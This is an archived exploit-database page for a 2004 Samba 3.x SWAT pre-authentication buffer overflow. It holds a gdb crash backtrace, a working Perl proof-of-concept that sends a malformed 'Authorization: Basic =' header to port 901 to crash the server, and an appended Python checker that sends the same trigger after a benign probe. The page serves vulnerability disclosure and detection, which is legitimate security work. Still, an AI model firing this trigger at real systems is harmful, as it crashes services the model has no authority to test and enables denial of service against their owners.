
sambaPoC.txt

Published: 23 Jul 2004. Reported by Noam Rathaus. Type: packetstorm. Source: packetstormsecurity.com

Proof of concept exploit for Samba 3.x buffer overflow causing segmentation fault in SWAT server.

Code
Hi,

The following is a brief proof of concept exploit code for the vulnerability mentioned in "Evgeny Demidov" <[email protected]>'s advisory: Samba 3.x swat preauthentication buffer overflow.
  
Running the perl script against a vulnerable SWAT server will cause:  
```
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 30853]
0x410957af in memcpy () from /lib/tls/libc.so.6
(gdb) bt
#0 0x410957af in memcpy () from /lib/tls/libc.so.6
#1 0xbffff340 in ?? ()
#2 0x00000001 in ?? ()
#3 0x080e34e7 in ?? ()
#4 0xbffff5e5 in ?? ()
#5 0x082919a0 in ?? ()
#6 0xffffffff in ?? ()
#7 0x080e08f0 in ?? ()
#8 0x082919a0 in ?? ()
#9 0xffffffff in ?? ()
#10 0x080e7090 in ?? ()
#11 0x0c0b8fae in ?? ()
#12 0xbffff5e5 in ?? ()
#13 0x00000000 in ?? ()
#14 0xbffff5a8 in ?? ()
#15 0x0806c97d in ?? ()
#16 0xbffff5e5 in ?? ()
#17 0x0815fd76 in ?? ()
#18 0x00000006 in ?? ()
#19 0x41150ebc in ?? () from /lib/tls/libc.so.6
#20 0x081c8480 in ?? ()
#21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6
#22 0xbffff3b4 in ?? ()
#23 0x081c8480 in ?? ()
#24 0x081c887f in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0xbffff3b4 in ?? ()
#28 0xbffff4cc in ?? ()
#29 0x00000400 in ?? ()
#30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6
#31 0xbffff3b4 in ?? ()
#32 0x08162fd9 in ?? ()
#33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6
#34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6
#35 0x00000000 in ?? ()
```
  
  
Exploit:

```perl
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#
# Usage: perl sambaPoC.pl <host>
# Opens one TCP connection to SWAT (port 901), sends a single GET whose
# Authorization header carries the malformed Basic credential "=", and
# prints whatever the server sends back.

use IO::Socket;
use strict;
use warnings;

my $host = $ARGV[0] or die "usage: $0 <host>\n";

my $remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "901",
);

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

# Every header line is CRLF-terminated; the trailing empty line ends the request.
my $http = join("\r\n",
    "GET / HTTP/1.1",
    "Host: $host:901",
    "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1",
    "Accept: text/xml",
    "Accept-Language: en-us,en;q=0.5",
    "Accept-Encoding: gzip,deflate",
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Keep-Alive: 300",
    "Connection: keep-alive",
    "Authorization: Basic =",    # the malformed credential that triggers the crash
    "", "");

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Echo the reply; a SWAT process that died in memcpy sends nothing back.
while (<$remote>) {
    print $_;
}
print "\n";

close $remote;
```
  
--   
Thanks  
Noam Rathaus  
CTO  
Beyond Security Ltd.  
  
Join the SecuriTeam community on Orkut:  
http://www.orkut.com/Community.aspx?cmm=44441  
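A way to run the same check without attaching gdb to the server, added here as an example and not part of Noam Rathaus's post or of Samba. It first sends a benign request (no Authorization header) to confirm that port 901 answers with an HTTP 401 challenge, and only then sends the `Authorization: Basic =` line the PoC uses, reporting whether the server replied or closed the connection with nothing. Assumptions: SWAT on its default TCP/901; SWAT run the usual way from (x)inetd, so each connection gets its own process and a crashed child shows up as a silent close while the port stays open; the User-Agent string and the outcome labels are the example's own. The trigger request still crashes a vulnerable SWAT child, so send it only to hosts you are authorised to test.

```python
"""Two-step SWAT crash check (added example, not advisory code).

Assumes SWAT on TCP/901 served from (x)inetd, one process per connection.
"""
import socket
from typing import Optional

SWAT_PORT = 901


def build_request(host: str, authorization: Optional[str]) -> bytes:
    """Build the GET the PoC sends; authorization=None omits the header."""
    lines = [
        "GET / HTTP/1.1",
        f"Host: {host}:{SWAT_PORT}",
        "User-Agent: swat-check/0.1",  # hypothetical UA string
        "Connection: close",
    ]
    if authorization is not None:
        lines.append(f"Authorization: {authorization}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def classify_reply(data: bytes) -> str:
    """Label the bytes read before EOF: no-reply, not-http, auth-challenge or http-NNN."""
    if not data:
        return "no-reply"  # connection closed without a single byte
    status_line = data.split(b"\r\n", 1)[0]
    parts = status_line.split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return "not-http"
    try:
        code = int(parts[1])
    except ValueError:
        return "not-http"
    return "auth-challenge" if code == 401 else f"http-{code}"


def verdict(baseline: str, trigger: Optional[str]) -> str:
    """Combine the benign probe and the trigger probe into one verdict."""
    if baseline != "auth-challenge":
        return "not-swat-or-unreachable"  # trigger was never sent
    if trigger == "no-reply":
        return "likely-vulnerable"  # child closed the socket before answering
    return "answered"  # server survived the malformed credential


def probe(host: str, authorization: Optional[str], timeout: float = 5.0) -> str:
    """Send one request and classify whatever arrives before EOF."""
    chunks = []
    with socket.create_connection((host, SWAT_PORT), timeout=timeout) as s:
        s.sendall(build_request(host, authorization))
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except (ConnectionResetError, socket.timeout):
            pass  # an abrupt reset or silence is treated like EOF
    return classify_reply(b"".join(chunks))


def check(host: str) -> dict:
    """Benign probe first; only a server that challenges for auth gets the trigger."""
    baseline = probe(host, None)
    trigger = probe(host, "Basic =") if baseline == "auth-challenge" else None
    return {"baseline": baseline, "trigger": trigger,
            "verdict": verdict(baseline, trigger)}


if __name__ == "__main__":
    import sys
    print(check(sys.argv[1]))
```

"likely-vulnerable" only means the child closed the connection without replying, which matches the segfault in the trace above but is also what a middlebox reset looks like; confirm on the host (a core file, or the signal logged for the SWAT process) before reporting it. Because the service is re-spawned per connection, checking whether port 901 is still open after the trigger tells you nothing.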


Vulners AI Score: 6.4 (Medium risk)
EPSS: 0.59614